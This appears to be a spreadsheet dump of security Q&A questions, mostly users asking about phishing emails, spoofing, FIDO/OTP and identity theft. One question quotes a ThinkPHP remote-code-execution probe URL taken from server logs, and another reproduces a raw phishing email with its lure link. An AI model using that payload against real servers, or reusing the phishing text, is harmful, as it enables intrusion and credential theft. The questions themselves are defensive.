    <t>&lt;p&gt;At my work email, which is handled by MS Office 365 Outlook, I keep getting phishing emails, typically 3 times a week, usually with some attachment &amp;quot;your company's monthly financial report&amp;quot; or &amp;quot;voicemail recording - high priority&amp;quot;, or &amp;quot;proforma invoice&amp;quot;. All of that is obvious BS, because none of that applies to me.&lt;/p&gt;
 &lt;p&gt;Those attachments are nearly always thinly disguised html files that would (presumably) forward me to an imitation log-in web page, or present a log-in via some script. Sometimes the phishing email even tries to legitimize the fake login script, saying &amp;quot;a login will be required to see the attachment&amp;quot;.&lt;/p&gt;
 &lt;p&gt;A few times I uploaded the suspected phishing attachment to VirusTotal, and it's always reliably detected as a phishing or malicious attachment.&lt;/p&gt;
 &lt;p&gt;I can't fathom why Microsoft 365 isn't capable of detecting and blocking these easy-to-identify phishing emails.&lt;/p&gt;
 &lt;p&gt;Just for kicks, I tried forwarding one such email to my personal Gmail account, but Gmail smartly and immediately declined to deliver it, replying &amp;quot;Remote Server returned '552-5.7.0 This message was blocked because its content presents a potential 552-5.7.0 security issue.&amp;quot;&lt;/p&gt;
 &lt;p&gt;I religiously keep clicking the &amp;quot;report phishing&amp;quot; in Outlook, but these emails keep coming.&lt;/p&gt;
 &lt;p&gt;If there's anything I can do to improve this situation, please let me know.&lt;/p&gt;</t>
  </si>
  <si>
    <t>ThinkPHP show my website as the req.host - did the request really come from my web server?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have ThinkPHP wordpress garbage coming at my server &lt;a href="https://medium.com/@knownsec404team/analysis-of-thinkphp5-remote-code-execution-vulnerability-5de8a0afb2d4" rel="nofollow noreferrer"&gt;https://medium.com/@knownsec404team/analysis-of-thinkphp5-remote-code-execution-vulnerability-&lt;/a&gt;5de8a0afb2d4
 , for example:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;/public/index.php?s=index/%5Cthink%5Capp/invokefunction&amp;amp;function=call_user_func_array&amp;amp;vars%5B0%5D=phpinfo&amp;amp;vars%5B1%5D%5B%5D=1
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I logged this request using req.headers['x-forwarded-for'] to get the ip address, which I have logged as: &lt;strong&gt;49.85.80.206&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;I am also using req.get('host') to see who sent the request and it shows my website - let's call it &lt;strong&gt;example.com&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Does this mean I have malware on my server, or it is more likely that the sender (taipei china) changed the 'host' in their cUrl request to appear to have come from my own server?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;phishing&gt;&lt;remote-code-execution&gt;</t>
  </si>
  <si>
    <t>Is lack of wildcard DNS entry a security vulnerability?</t>
  </si>
  <si>
    <t>&lt;p&gt;A friend of a friend received an email from a security researcher that looks legit. Researcher submitted several vulnerabilities, one of the them reads like this&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Vulnerability # ...&lt;/p&gt;
  &lt;p&gt;Title : Lack of wildcard DNS Entry!&lt;/p&gt;
  &lt;p&gt;Description :
  The risk of attackers knowing the wildcard which could thus result in
  DNS Hijacking and further threats. There are several issues related to
  this. The most common i can think of is phishing. Wildcard DNS is a
  handy feature, and phishers are apparently using it to bypass
  filtering. Phishers use wildcard DNS to get around filtering since
  filtering, in many cases, is based on exact host name and domain name
  combinations. With wildcard DNS Phishers can generate any number of
  differing URLs on the fly and often evade filtering technology.&lt;/p&gt;
  &lt;p&gt;On the Web server side, a simple bit of code can parse the URL to find
  which hostname was used to land on a site, and then redirect the
  visitors as necessary.&lt;/p&gt;
  &lt;p&gt;And there is no wildcard entry so attacker easily enumerate your
  secret and Public Subdomains.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Then comes a proof of concept with an output from DNS brute-force tool &lt;a href="https://github.com/guelfoweb/knock"&gt;knock&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;Just to clarify, the website in question does not have a wildcard (*) in the DNS entry and recursive sub-queries to the DNS are not allowed (e.g. AXFR query doesn't work). The website treats DNS sub-domains as public information anyway. IMO, this is not a vulnerability - it's by design, just want to cross-check with the community.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Question:&lt;/strong&gt; is lack of a wildcard entry in the DNS a security vulnerability?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;brute-force&gt;&lt;dns&gt;&lt;vulnerability&gt;&lt;disclosure&gt;&lt;wildcard&gt;</t>
  </si>
  <si>
    <t>Is a full name and address all that's needed for identity theft?</t>
  </si>
  <si>
    <t>&lt;p&gt;It seems knowing a person's name and address is pretty much all that's needed for identity theft, no?&lt;/p&gt;
 &lt;p&gt;Couldn't those two variables enable one to pose as another person successfully? Given so, it makes it much, much easier to steal someone's identity with such easily obtainable things than would be for other difficult means (like phishing, hacking someone's personal account/computer, etc.).&lt;/p&gt;
 &lt;p&gt;Simply knowing an address where a person lives and their full name seems to be all that's needed to kickstart identity theft, and from what I can tell both of those things can be extremely easy to get.&lt;/p&gt;
 &lt;p&gt;So is a name and an address linked to that name all that's needed to steal a person's identity?&lt;/p&gt;
 &lt;p&gt;Imagine, for example, that you call a bank to say that you forgot your account number, but you provide the name of the person's account you're looking for plus their address and account type. Isn't that halfway to accessing someone's account already? I'd imagine not much else would be needed. They can't ask for social security number over the phone, and this sounds like a thief's dream.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;identity-theft&gt;</t>
  </si>
  <si>
    <t>Phishing email with encoded url params</t>
  </si>
  <si>
    <t>&lt;p&gt;I received a phishing email with the following format:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;hxxp://&amp;lt;%legitimateSite%&gt;/~!@%23$%25%5e&amp;amp;&lt;em&gt;()_+~!@%23$%25%5e&amp;amp;&lt;/em&gt;()&lt;em&gt;+~!@%23$%25%5e&amp;amp;*()&lt;/em&gt;+~!@%23$%25%5e&amp;amp;&lt;em&gt;()_+~!@%23$%25%5e&amp;amp;&lt;/em&gt;()&lt;em&gt;+~!@%23$%25%5e&amp;amp;*()&lt;/em&gt;+~!@%23$%25%5e&amp;amp;&lt;em&gt;()_+~!@%23$%25%5e&amp;amp;&lt;/em&gt;()&lt;em&gt;+~!@%23$%25%5e&amp;amp;*()&lt;/em&gt;+~!@%23$%25%5e&amp;amp;&lt;em&gt;()_+~!@%23$%25%5e&amp;amp;&lt;/em&gt;()&lt;em&gt;+~!@%23$%25%5e&amp;amp;*()&lt;/em&gt;+/&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;but I can't make out what &lt;code&gt;~!@%23$%25%5e&amp;amp;*()&lt;/code&gt; is - is it an obfuscated js function? I see traces of this string on google, but nothing concrete as to what it does.&lt;/p&gt;
 &lt;p&gt;It translates to this:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;"/~!@#$%^&amp;amp;&lt;em&gt;()_+~!@#$%^&amp;amp;&lt;/em&gt;()&lt;em&gt;+~!@#$%^&amp;amp;*()&lt;/em&gt;+~!@#$%^&amp;amp;&lt;em&gt;()_+~!@#$%^&amp;amp;&lt;/em&gt;()&lt;em&gt;+~!@#$%^&amp;amp;*()&lt;/em&gt;+~!@#$%^&amp;amp;&lt;em&gt;()_+~!@#$%^&amp;amp;&lt;/em&gt;()&lt;em&gt;+~!@#$%^&amp;amp;*()&lt;/em&gt;+~!@#$%^&amp;amp;&lt;em&gt;()_+~!@#$%^&amp;amp;&lt;/em&gt;()&lt;em&gt;+~!@#$%^&amp;amp;*()&lt;/em&gt;+~!@#$%^&amp;amp;&lt;em&gt;()_+~!@#$%^&amp;amp;&lt;/em&gt;()&lt;em&gt;+~!@#$%^&amp;amp;*()&lt;/em&gt;+~!@#$%^&amp;amp;&lt;em&gt;()_+~!@#$%^&amp;amp;&lt;/em&gt;()&lt;em&gt;+~!@#$%^&amp;amp;*()&lt;/em&gt;+~!@#$%^&amp;amp;*()_+/"&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Would that be just a path to a index.php file to a malicious file download?&lt;/p&gt;
 &lt;p&gt;A similar thread online:&lt;/p&gt;
 &lt;p&gt;GET /%21@%23$%25%5E&amp;amp;%2A%28%29%29%28%2A&amp;amp;%5E%25$%23@%21/Review%20/ApproveDocument/Office%20365_files/shellg2coremincss_ba45585d.css HTTP/1.1 &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;http&gt;&lt;javascript&gt;&lt;phishing&gt;&lt;encoding&gt;&lt;obfuscation&gt;</t>
  </si>
  <si>
    <t>Impersonating phishing incident</t>
  </si>
  <si>
    <t>&lt;p&gt;An email has been circulated with the username of our organization, with some internal users and also to the customers. Observed that IP 40.92.46.74, which is Microsoft one. We have been using our organizational email-signature for all our users. that email-signature is being used in this impersonation incident circulating the spoof email with internal users and customers. we are using Mimecast secure email gateway. please help us how to efficiently prevent similar emails?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Should big companies publicly list their legit emails and links?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've been going through a hassle with a big mobile company about if I should click into a link in an email that I think is from them. The email and the link inside is not obviously from the company, as the domains do not match up to the providers domain, or alternate domains. It seems through discussion on the company forum that it's not clear that this email is legit. This has been a confusing situation.&lt;/p&gt;
 &lt;p&gt;Should large companies have a security standards page, wherein they list all legit emails and domains that belong or are associated with them? For someone like me who checks the sender email and the domain of the links within it, I want to know who they are. If the company listed them on their website I would feel instantly safe. But instead I've wasted hours trying to resolve this situation without an answer yet.&lt;/p&gt;
 &lt;p&gt;My question - does such a scheme exist to list legit emails/domains on company websites? If not, why? If so, where?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Determining how my Wordpress website was compromised</t>
  </si>
  <si>
    <t>&lt;p&gt;I have got a blog running Wordpress. The last time I visited my blog I realized it was hacked. The website redirects to a phishing page of paypal meanwhile other links a opening fine. I want to know how that attack was made, how to fix this problem and what security measures I must adopt so that it should not happen in future.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wordpress&gt;</t>
  </si>
  <si>
    <t>What happens when authenticating through a phishing attack with FIDO U2F tokens</t>
  </si>
  <si>
    <t>&lt;p&gt;So I have looked around and haven't found this anywhere. What happens when the response server is a phishing site with FIDO U2F tokens? &lt;/p&gt;
 &lt;p&gt;Basically, if login just fails, I would assume that the user would try again a couple of times, assume that something is broken and fall back to using OTP 2 factor which defeats the purpose. &lt;/p&gt;
 &lt;p&gt;The other option would be that there would be some form of notification, which would be helpful and logical, but I havent seen anything saying that this happens. &lt;/p&gt;</t>
  </si>
  <si>
    <t>Are there still ways that OTP is safer than FIDO?</t>
  </si>
  <si>
    <t>&lt;p&gt;From my reading I understand that USB keys (for example Yubikeys) are more secure than OTP authentication apps (such as Google Authenticator). The primary reason is that FIDO is done without human interaction so it's not susceptible to social engineering or phishing attacks. Also, it connects with the service provider using encryption so it protects against man-in-the middle-attacks. Is my understanding correct so far?&lt;/p&gt;
 &lt;p&gt;I can still think of several benefits that Authenticator Apps have over USB keys.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Most people already have a smartphone so there's no additional cost or burden&lt;/li&gt;
 &lt;li&gt;If lost or stolen, phones can be remotely tracked, locked and wiped.&lt;/li&gt;
 &lt;li&gt;Phones can be encrypted or at least have a lock screen&lt;/li&gt;
 &lt;li&gt;The Authenticator App can be password protected&lt;/li&gt;
 &lt;li&gt;Backup codes for OTP can be used, whereas it seems much more of a problem if a USB with keys is lost.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Given these facts I find it hard to see why people use things like USB keys?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;one-time-password&gt;&lt;yubikey&gt;</t>
  </si>
  <si>
    <t>Can an HTML attachment in an email contain a virus?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an email from an old colleague asking me to take a look at an attachment. The email didn‚Äôt seem suspicious at all, it contained all the right logos, etc. When I opened the attachment it asked me to click on a button, which I did, then it asked me for my login credentials. This was on my iPhone. I stupidly went on my PC so I could read the document better and opened the same attachment and got to the same screen, when I realized that this was obviously a scam. I didn‚Äôt enter any information in, but I‚Äôm worried that there still may be some sort of virus or Trojan.&lt;/p&gt;
 &lt;p&gt;I did some research and similar scams have occurred (eFax) but in those cases a word or excel document opened which would then run a macro and install some sort of virus / Trojan to steal personal and banking information. This doesn‚Äôt apply in my case as a HTML opened but I‚Äôm still really worried. I ran a full scan on my PC with windows defender and nothing came up.&lt;/p&gt;
 &lt;p&gt;Edit: I‚Äôm kind of freaking out at the moment because at this point there‚Äôs nothing I can do. 30 minutes after clicking the email attachment I turned off my internet for the laptop. Also I do not have any saved passwords on my computer. However, I have obviously entered passwords in my computer in the past. I also have some documents on my computer that contain very sensitive information. My intuition tells me that this would make it very difficult for the hacker to access my passwords as the last time I entered them must have been a few months ago as I barely use my laptop. Also, it is unlikely they would be able to scan the hundreds of documents on my computer and send it to them in 30 minutes‚Ä¶ (can someone confirm for my sanity lol). Also nothing came up on the scan, which I know will not be perfect but‚Ä¶&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;virus&gt;&lt;phishing&gt;&lt;html&gt;</t>
  </si>
  <si>
    <t>How did a phishing email pass SPF, DKIM and DMARC?</t>
  </si>
  <si>
    <t>&lt;p&gt;A friend received a spoofed email (from &lt;em&gt;Bank of America&lt;/em&gt; using an &lt;em&gt;uber.com&lt;/em&gt; address) which was correctly identified as 'spam' by Gmail. However, looking at the raw message it seems to have passed SPF, DKIM and DMARC checks. &lt;/p&gt;
 &lt;p&gt;1) How did a spam email manage to pass SPF, DKIM and DMARC using a source domain as popular as &lt;em&gt;uber.com&lt;/em&gt; - a domain the spammers likely don't control?&lt;/p&gt;
 &lt;p&gt;2) Is there anything else in the message header/body which would conclusively determine the email to be spoofed? (i.e. other than probabilistic reasoning or blacklisting of elements contained within e.g. external links)&lt;/p&gt;
 &lt;p&gt;Pasted below is the entire raw message (destination email changed for anonymity).&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Delivered-To: myemail@gmail.com
 Received: by 2002:a19:f009:0:0:0:0:0 with SMTP id p9csp8149944lfc;
  Thu, 2 May 2019 15:48:40 -0700 (PDT)
 X-Google-Smtp-Source: APXvYqyhm5pZuY7Fm7UQDAafePILEmcZUG7oB/gvcd6J/EhUFwZiS3XMf65THeoGx++FQCmhzOCE
 X-Received: by 2002:a17:906:13d2:: with SMTP id g18mr3231656ejc.78.1556837320717;
  Thu, 02 May 2019 15:48:40 -0700 (PDT)
 ARC-Seal: i=1; a=rsa-sha256; t=1556837320; cv=none;
  d=google.com; s=arc-20160816;
  b=eXB2eqanspJQA6s/q5LqzZmlHbIEk21g9zucGA8hxmjYVXu0b3XnZzYUdJjY5bA0at
  P6F6qlig4aO5N2Gsr8a9MDRSvvfAibeRTENq/7iO3gaUQIbAM9gQ/aQhV6uLiD+DoSZU
  dHhhwJB2GQ/5Dh6HoXNuj4SrTMn3yHOEuQA4I+Htw7B1CASkDTIKcs7CART606F33R3N
  hJqQWlkTlXRNKeSCVY9Ji+7Ij08mciIOJXA2ug0ZYvH9W/C1St8yENSLKfFcrJlk/U/c
  OyxFmB11yDK9wP9Af5JyzOlkNvGVhXgo1oZzNuB0cyY0nn/HynNrzWhhhTBohg6p92k7
  9CuQ==
 ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
  h=message-id:to:subject:reply-to:mime-version:from:date
  :dkim-signature:dkim-signature;
  bh=qLQDboUSSv8iAbkYL4wb/BR8FXlb49YUxc2eDjBWs5k=;
  b=EtdsO3m3lHH8+WCcDco6Ahfet2PLEix2p1NKcgzqD7fH+37MPmVieWp3qZo2gy0cgD
  VP4TGaspSGND2cjBZUqlTr6ScJPj98eRtsIOVb/CRgocSy354o72WzT43P2LXJaOSz+L
  Rq814M7GHwrtutY3bWpYteO2nEAg18EgSyjC7mYqYvERRa7OFhIJO36/ZnAxCGV5xWTm
  nd3evLaWNpsRP8eUysyOkuC1wGNW9HGCdcs0q5meSfxl+3PmYzTZ4MlrhAxvEWyPRRM4
  gDnwQ7w6RUZjGtbsEWul/5zKa5HDX1jTtH4DRYWe3MaLJ4zpFPQ289mnypfpoHB9vNKb
  wS5A==
 ARC-Authentication-Results: i=1; mx.google.com;
  dkim=pass header.i=@uber.com header.s=s1 header.b=sGXq8dN3;
  dkim=pass header.i=@sendgrid.info header.s=smtpapi header.b=hex9bvGh;
  spf=pass (google.com: domain of bounces+3504297-df62-myemail=gmail.com@em.uber.com designates 50.31.36.149 as permitted sender) smtp.mailfrom="bounces+3504297-df62-myemail=gmail.com@em.uber.com";
  dmarc=pass (p=QUARANTINE sp=QUARANTINE dis=NONE) header.from=uber.com
 Return-Path: &amp;lt;bounces+3504297-df62-myemail=gmail.com@em.uber.com&amp;gt;
 Received: from o15.email.uber.com (o15.email.uber.com. [50.31.36.149])
  by mx.google.com with ESMTPS id c8si312626edb.189.2019.05.02.15.48.40
  for &amp;lt;myemail@gmail.com&amp;gt;
  (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
  Thu, 02 May 2019 15:48:40 -0700 (PDT)
 Received-SPF: pass (google.com: domain of bounces+3504297-df62-myemail=gmail.com@em.uber.com designates 50.31.36.149 as permitted sender) client-ip=50.31.36.149;
 Authentication-Results: mx.google.com;
  dkim=pass header.i=@uber.com header.s=s1 header.b=sGXq8dN3;
  dkim=pass header.i=@sendgrid.info header.s=smtpapi header.b=hex9bvGh;
  spf=pass (google.com: domain of bounces+3504297-df62-myemail=gmail.com@em.uber.com designates 50.31.36.149 as permitted sender) smtp.mailfrom="bounces+3504297-df62-myemail=gmail.com@em.uber.com";
  dmarc=pass (p=QUARANTINE sp=QUARANTINE dis=NONE) header.from=uber.com
 DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d=uber.com; h=content-type:from:mime-version:reply-to:subject:to; s=s1; bh=v7x4HoONz0ezNRDnKYF0uc2hhtM=; b=sGXq8dN3+HHhABwT351Y+af+nr2B8 pHTDx2MjlKRIDe7H/cnIsI/CpwpJLrb8Stp9RsP0sP5nK3TZmKHQwJedhRvBTC7n r/uPT0JSi+ONLtF9C+0qRXmWmJtqQzFf9slsVRdHaXX8RLa6yaLLzwsHuuRdaJZG o4oB6ZA5AJCesY=
 DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d=sendgrid.info; h=content-type:from:mime-version:reply-to:subject:to:x-feedback-id; s=smtpapi; bh=v7x4HoONz0ezNRDnKYF0uc2hhtM=; b=hex9bvGhVyaiDwHKrN h24yUEJB4HO3pTdxhcoAK5VsaYOCXZx9p4blLSQp3uV8ew7NLo2z/zx4csNICZWh SmC8COHDgWcHciNfl43kiraXp400kRYiGsS1pHqVRX5Ob8D0JkPBK5O8DVaeruG8 CZA/6xSoS+V/bEH7nyXlXwrfc=
 Content-Type: multipart/alternative; boundary=05837142e85bc2c4ac09b1d30a5ba3fe4f9b7871babe88f65414e2efb0b2
 Date: Thu, 02 May 2019 22:48:36 +0000 (UTC)
 From: Bank Of America &amp;lt;peopledevelopment@uber.com&amp;gt;
 Mime-Version: 1.0
 Reply-to: peopledevelopment@uber.com
 Subject: [ALERT] Your account id has been blocked !!
 To: myemail@gmail.com
 Message-ID: &amp;lt;EYI_MwnGTyKSrZKHNQnOnw@ismtpd0039p1iad1.sendgrid.net&amp;gt;
 X-SG-EID: BJ2Hyk3p2HXeBi9v1wQzSyZ8DM5WrDY+tsMwP5EVk1O0bcaJmQS4hZuUFgRtapyAExYteHWmn73qmX 7VEhHR5sd3ci/g+WzM8Uf68Ux7oY1gt0agNXHr4DKEE+nngxEBm8ZP2xGBiEEEpg5Whgqt/yWpHjZ7 HukhCl3QGdVTLehqCV+7CWTGIxhA8qDvQEtuCLBT6YeFBksxtcPbtJlU+nsHzCU+ZUGuJa5/mD+y0F s7tmnWQuHkKZKYL9EbGQts
 X-SG-ID: Z2FxZazunBjVeNuNdzHDqrF8mxuCpi0krmont6YQrP1PhrSAm6F2vnhCz+cZmwIQQzzeNf3kS2PU4G C99ZbMEWr4lLYj5ol2knDZ/n3jZwq//ee6CYHr7NePdVS5vtJCVf7ranRUtPwlaGzBDEs80XrtvoiJ GPsexH5dsi0CLhc=
 X-Feedback-ID: 3504297:hpZl/F8wyMjPOktsUM9fV9PBbsSgTLHDWo42qpJEarc=:hISn6uOVLCzR0vuCEri7CQ==:SG
 --05837142e85bc2c4ac09b1d30a5ba3fe4f9b7871babe88f65414e2efb0b2
 Content-Transfer-Encoding: quoted-printable
 Content-Type: text/plain; charset=UTF-8
 Mime-Version: 1.0
 Dear Valued Customer,=20
 You Have A Personal Security Alert from BankOfAmerica.
 Sign-On https://flyingteachers.nl//wp-content/Wordpress/
 Note: You will need to update your information for that service completely.=
 =20
 =C2=A9 Copyright, BankOfAmerica, 2019.=20
 Access https://google.com
 --05837142e85bc2c4ac09b1d30a5ba3fe4f9b7871babe88f65414e2efb0b2
 Content-Transfer-Encoding: quoted-printable
 Content-Type: text/html; charset=UTF-8
 Mime-Version: 1.0
 &amp;lt;HTML&amp;gt;&amp;lt;HEAD&amp;gt;&amp;lt;/HEAD&amp;gt;
 &amp;lt;BODY&amp;gt;&amp;amp;nbsp;&amp;lt;IMG src=3D"https://www2.bac-assets.com/homepage/spa-assets/ima=
 ges/assets-images-global-logos-boa-logo-CSXe4b047c0.svg" width=3D279 height=
 =3D64&amp;gt;=20
 &amp;lt;TABLE id=3Dyui_3_7_2_1_1357636237151_3250 style=3D"FONT-SIZE: 12px; FONT-F=
 AMILY: Arial, Helvetica, sans-serif" cellSpacing=3D0 cellPadding=3D0 width=
 =3D600 border=3D0&amp;gt;
 &amp;lt;TBODY&amp;gt;&amp;lt;/TBODY&amp;gt;&amp;lt;/TABLE&amp;gt;&amp;lt;BR&amp;gt;Dear Valued Customer, &amp;lt;BR&amp;gt;&amp;lt;BR&amp;gt;You Have A Person=
 al Security Alert from BankOfAmerica.&amp;lt;BR&amp;gt;
 &amp;lt;P&amp;gt;&amp;lt;/P&amp;gt;
 &amp;lt;P&amp;gt;&amp;lt;FONT id=3Dyui_3_16_0_1_1399663152274_19869 style=3D"FONT-SIZE: 12px; CO=
 LOR: #333333; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif"&amp;gt;
 &amp;lt;TABLE id=3Dyui_3_16_0_1_1399663152274_48813 style=3D"BACKGROUND: no-repeat=
  left top" height=3D15 cellSpacing=3D0 cellPadding=3D0 width=3D111 bgColor=
 =3D#6cae35 border=3D0&amp;gt;
 &amp;lt;TBODY id=3Dyui_3_16_0_1_1399663152274_48812&amp;gt;
 &amp;lt;TR id=3Dyui_3_16_0_1_1399663152274_48811 bgColor=3D#6cae35&amp;gt;
 &amp;lt;TD id=3Dyui_3_16_0_1_1399663152274_48862 bgColor=3D#6cae35 vAlign=3Dmiddle=
  width=3D15 align=3Dcenter&amp;gt;&amp;lt;FONT size=3D2&amp;gt;&amp;lt;HTTPS: id=3Dyui_3_16_0_1_1399663=
 152274_48861 width=3D"15" height=3D"15" email_cta_arrow.gif=3D"" media=3D""=
  static_assets=3D"" mcontent=3D"" content.usaa.com=3D""&amp;gt;&amp;lt;/HTTPS:&amp;gt;&amp;lt;/FONT&amp;gt;&amp;lt;/T=
 D&amp;gt;
 &amp;lt;TD id=3Dyui_3_16_0_1_1399663152274_48810 bgColor=3D#6cae35 vAlign=3Dmiddle=
  width=3D96 align=3Dcenter&amp;gt;&amp;lt;A id=3Dyui_3_16_0_1_1399663152274_48814 style=
 =3D"TEXT-DECORATION: none; COLOR: #fff; FONT: bold 11px arial, sans-serif" =
 href=3D"http://email.uber.com/wf/click?upn=3D-2FQ0tIReEQQvMTn37D6ijIfRAMGF2=
 MPDMqrIBax6TjqHI26EB2dJUvOpfb6-2BtHW1GBBasvV-2BPdUGxE65m1S0AUw-3D-3D_upBRTD=
 Ma1f8arr27T-2FChSHKA02CtoItCQ9e6PNbvcG9XxnPK4VYSIoINuPPUDOYMFaHDvWWc6mRXY-2=
 BjkyEJ4uGUdSbHsos4WOz9Yr529xiH9tDHJLxlZMIShGPk0S8U4onf5vQHto3-2B7-2BwbS3DDx=
 gGjcR-2BFeB1tfaZTkc-2BdDdmBj2b7z5S6KGHutMpn48l3JhaVOuRvB-2F5niKuSo53oVEp9Ag=
 pJI7RnaO6AO3D5pLjHBeAsWMwbWL4o9BhEfMC8cT0zWfUna8GP3wEKDFrXWVmspJeNCXCcqbUUp=
 SUF49HwDS-2F279HaQ-2BkL8PVsX8eMAvnRBRi8DRIAWf938W9MaPq8yv9aeEq8G6uedSgCjCX1=
 FAAhXKhtxerCOMO6JhOYPlm2-2FHX633X1SrBaiTYZGOw-3D-3D" rel=3Dnofollow target=
 =3D_blank&amp;gt;Sign-On&amp;lt;/A&amp;gt;&amp;lt;/TD&amp;gt;&amp;lt;/TR&amp;gt;&amp;lt;/TBODY&amp;gt;&amp;lt;/TABLE&amp;gt;&amp;lt;/FONT&amp;gt;&amp;lt;/P&amp;gt;Note: You will ne=
 ed to update your information for that service completely. &amp;lt;BR&amp;gt;&amp;lt;BR&amp;gt;&amp;lt;FONT id=
 =3Dyui_3_13_0_1_1398145588576_6499 size=3D1&amp;gt;&amp;lt;/FONT&amp;gt;&amp;lt;FONT size=3D2&amp;gt;=C2=A9 Co=
 pyright, BankOfAmerica, 2019.&amp;lt;/FONT&amp;gt;=20
 &amp;lt;img src=3D"http://email.uber.com/wf/open?upn=3DupBRTDMa1f8arr27T-2FChSHKA0=
 2CtoItCQ9e6PNbvcG9XxnPK4VYSIoINuPPUDOYMFaHDvWWc6mRXY-2BjkyEJ4uGUdSbHsos4WOz=
 9Yr529xiH9tDHJLxlZMIShGPk0S8U4onf5vQHto3-2B7-2BwbS3DDxgGjcR-2BFeB1tfaZTkc-2=
 BdDdmBj2b7z5S6KGHutMpn48l3JhaVOuRvB-2F5niKuSo53oVEnZOKS1AsqehIRfEXmYLYu3fhQ=
 UZgheXahrlWwKmrfQylaw7Y2sX09qWBC67FiV-2Fwmf5O6ZvgYoAV3vtQZhLjSa6B7I0DiwhfzK=
 11lBOmIXiMuUc30aqH9s9sDIGqnGR8O-2Fdgjw-2FWHQjWqMlfMnd1TWWYULqOl5xYb-2BD-2B1=
 JMvHPISuLN3S-2BBtXPo-2BSzlYb9YTw-3D-3D" alt=3D"" width=3D"1" height=3D"1" b=
 order=3D"0" style=3D"height:1px !important;width:1px !important;border-widt=
 h:0 !important;margin-top:0 !important;margin-bottom:0 !important;margin-ri=
 ght:0 !important;margin-left:0 !important;padding-top:0 !important;padding-=
 bottom:0 !important;padding-right:0 !important;padding-left:0 !important;"/=
 &amp;gt;
 &amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;
 &amp;lt;a href=3D"http://email.uber.com/wf/click?upn=3D-2FQ0tIReEQQvMTn37D6ijIUDYH=
 X2-2FyU5mi0Enz-2FchsQI-3D_upBRTDMa1f8arr27T-2FChSHKA02CtoItCQ9e6PNbvcG9XxnP=
 K4VYSIoINuPPUDOYMFaHDvWWc6mRXY-2BjkyEJ4uGUdSbHsos4WOz9Yr529xiH9tDHJLxlZMISh=
 GPk0S8U4onf5vQHto3-2B7-2BwbS3DDxgGjcR-2BFeB1tfaZTkc-2BdDdmBj2b7z5S6KGHutMpn=
 48l3JhaVOuRvB-2F5niKuSo53oVEggJcxBzsBUTFT7XWbdRLfOKJHct29bBLqq-2FiX-2BnFPQ-=
 2BLCqjk6YuSfSFkaKdm5QvdZMBusseXcTQlJhzVP-2Beo5392uwTJHnkaMczik43b2te8teMEjS=
 hfujpSCF4MTUkjQ5IBldCR7EOeT4-2BF6vpq0Ctnr2W7ZarsqWFftMiNy8s-2BU-2F5eF1gGJwN=
 7E92IF4inQ-3D-3D" target=3D"_blank" rel=3D"noopener"&amp;gt;Access&amp;lt;/a&amp;gt;
 --05837142e85bc2c4ac09b1d30a5ba3fe4f9b7871babe88f65414e2efb0b2--
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;email-spoofing&gt;&lt;spf&gt;&lt;dkim&gt;&lt;dmarc&gt;</t>
  </si>
  <si>
    <t>Phishing email sent to me within a few hours after a related incident, what should I do?</t>
  </si>
  <si>
    <t>&lt;p&gt;A few hours ago I was helping a family member pay for something on a government website with one of his credit cards, but for whatever reason it didn't go through, so we used another card and it worked fine. I also put in one of my email accounts for the receipt and payment confirmation, which I got in a minute after paying.&lt;/p&gt;
 &lt;p&gt;Two hours later I get a phishing email sent to my 'main' email account from a different provider (ie, not the one I put in previously) that pretended to be the credit card company of the card that didn't go through, saying that there was unusual activity in my account and they declined payments, click the link, etc. (I did accidentally open the link on my Blackberry 10 phone before checking the email address that sent it which was stupid of me)&lt;/p&gt;
 &lt;p&gt;Am I compromised in some way and how does this usually happen? I assume I should change my passwords.&lt;/p&gt;</t>
  </si>
  <si>
    <t>What to do after being phished for address, DOB and NI number?</t>
  </si>
  <si>
    <t>&lt;p&gt;When someone has given away their details as above, can anything be done to preemptively prevent identity theft?&lt;/p&gt;
 &lt;p&gt;Address, date of birth and national insurance number are obviously not passwords that can be changed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Can opening an email be tracked with a wav file?</t>
  </si>
  <si>
    <t>&lt;p&gt;I work for a large company and they are currently running a phishing training program. I received one of these "safe" phishing emails and found something I don't really understand.&lt;/p&gt;
 &lt;p&gt;There are several png files and one wav file that are hidden at the bottom, all of which reference what looks to be a unique web site. I know that loading the png image can be used for tracking but by default (I use Outlook 2016) images are blocked and therefore wouldn't load unless I allowed them.&lt;/p&gt;
